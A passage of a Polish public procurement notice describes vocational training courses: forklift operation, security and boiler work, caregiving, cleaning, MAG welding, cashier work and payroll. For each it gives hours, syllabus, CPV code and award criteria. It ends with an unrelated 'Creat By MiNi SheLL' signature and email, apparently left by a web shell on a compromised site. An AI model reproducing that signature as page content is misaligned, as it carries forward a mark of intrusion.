<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> magazynier z obsługą wózków jezdniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 160 h (w tym 68h - magazynier; 92h - kurs kierowców wózka), 
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3)zajęcia 5 razy w tygodniu (bez weekendów),
4)elementy gospodarki magazynowej,
5)obsługa komputera,
6)prowadzenie księgowości materiałowej i obrotu towarowego z wykorzystaniem komputera (tworzenie kartotek, dokumenty, inwentaryzacja, archiwizacja danych itp.),
7)kurs kierowców wózków jezdniowych z napędem silnikowym z wymianą butli gazowej (w tym 40h praktycznej nauki jazdy wózkiem)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ochroniarz + palacz c.o..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 160 h, 
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3)zajęcia 5 razy w tygodniu (bez weekendów),
4)zasady organizacji i działania ochrony osób i mienia,
5)uprawnienia pracowników ochrony,
6)obowiązki pracowników ochrony,
7)odpowiedzialność cywilna i karna pracowników ochrony,
8)ochrona danych osobowych,
9)łączność,
10)zajęcia praktyczne,
11)wiadomości ogólne z zakresu eksploatacji centralnego ogrzewania,
12)budowa i podział kotłów, 
13)armatura kotłów, 
14)paleniska kotłowe i ich podział,
15)woda w eksploatacji urządzeń kotłowych,
16)uruchamianie kotła, 
17)prowadzenie dokumentacji,
18)postępowanie w przypadku wybuchu kotła,
19)zajęcia praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Opiekun dzieci oraz osób przewlekle chorych 
i niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 120 h (w tym 40h teorii, 80 h praktyki),
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3)zajęcia 5 razy w tygodniu (bez weekendów),
4)elementy pedagogiki opiekuńczej, psychologii - komunikacja interpersonalna, zagadnienia prawne,
5)zaspokajanie podstawowych potrzeb fizjologicznych dziecka,
6)stosowanie podstawowych zasad i metod wychowania,
7)dobór zabaw i gier wpływających na rozwój dziecka,
8)literatura dziecięca,
9)choroby wieku dziecięcego, wstępne objawy i rozpoznanie, profilaktyka,
10)opieka nad chorym dzieckiem,
11)żywienie niemowląt i małych dzieci,
12)pielęgnacja i opieka nad osobami starszymi, chorymi lub niepełnosprawnymi (podstawy higieny i pielęgnacji, utrzymanie czystości w otoczeniu podopiecznego, dietetyka, żywienie i przygotowywanie posiłków, pierwsza pomoc przedlekarska, podawanie leków, problemy zdrowotne ludzi starszych, osób przewlekle chorych i niepełnosprawnych, stosowanie wybranych form terapii zajęciowej, wybrane zagadnienia z rehabilitacji, elementy masażu leczniczego, profilaktyka, organizacja czasu wolnego podopiecznych, organizacja pracy własnej oraz zasady BHP, etyka w zawodzie opiekuna)
13)zajęcia praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> profesjonalne sprzątanie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 80 h (w tym 20h teorii, 60 h praktyki),
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3)zajęcia 5 razy w tygodniu (bez weekendów),
4)problematyka czystości,
5)rodzaje i typy podłóg,
6)środki chemiczne, ich rodzaje i zastosowanie,
7)podstawowe technologie sprzątania,
8)BHP w podstawowych procesach sprzątania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> spawanie metodą MAG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 257 h metodą MAG (blachy i rury spoinami pachwinowymi oraz blachy spoinami czołowymi), 
2)zajęcia mogą się odbywać do 6 razy w tygodniu (oprócz niedziel),
3)procesy spawania,
4)materiały spawalnicze,
5)urządzenia do spawania,
6)technologie i techniki spawania,
7)przygotowanie materiału do spawania,
8)zakres zgodny z wytycznymi Instytutu Spawalnictwa w Gliwicach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Sprzedawca z obsługą kasy fiskalnej i minimum sanitarnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 120 h,
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3)zajęcia 5 razy w tygodniu (bez weekendów),
4)obsługa kasy fiskalnej,
5)obsługa kasy systemowej (kasa fiskalna współpracująca z komputerem),
6)rozliczenia finansowe,
7)minimum sanitarne,
8)BHP na stanowisku pracy,
9)praca z gotówką,
10)techniki sprzedaży i obsługi klienta detalicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> uproszczona księgowość, kadry, płace.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmuje:
1)blok zajęć teoretyczno-praktycznych - 120 h (w tym 30 h teorii, 90 godzin praktyki),
2)1 godzina dydaktyczna = 45 minut, 8h dydaktycznych dziennie,
3)zajęcia 5 razy w tygodniu (bez weekendów),
4)podstawy księgowości,
5)podstawy rachunkowości i finansów,
6)rachunek kosztów i rachunkowość zarządcza,
7)wykorzystanie programu komputerowego Płatnik,
8)klasyfikacja podstawowych podmiotów gospodarczych, usytuowanie w nich działu kadr i płac,
9)wybrane zagadnienia z prawa pracy,
10)kadry,
11)ubezpieczenia społeczne,
12)płace,
13)szkolenie BHP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie Wykonawcy w prowadzeniu szkoleń w przedmiotowym zakresie - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com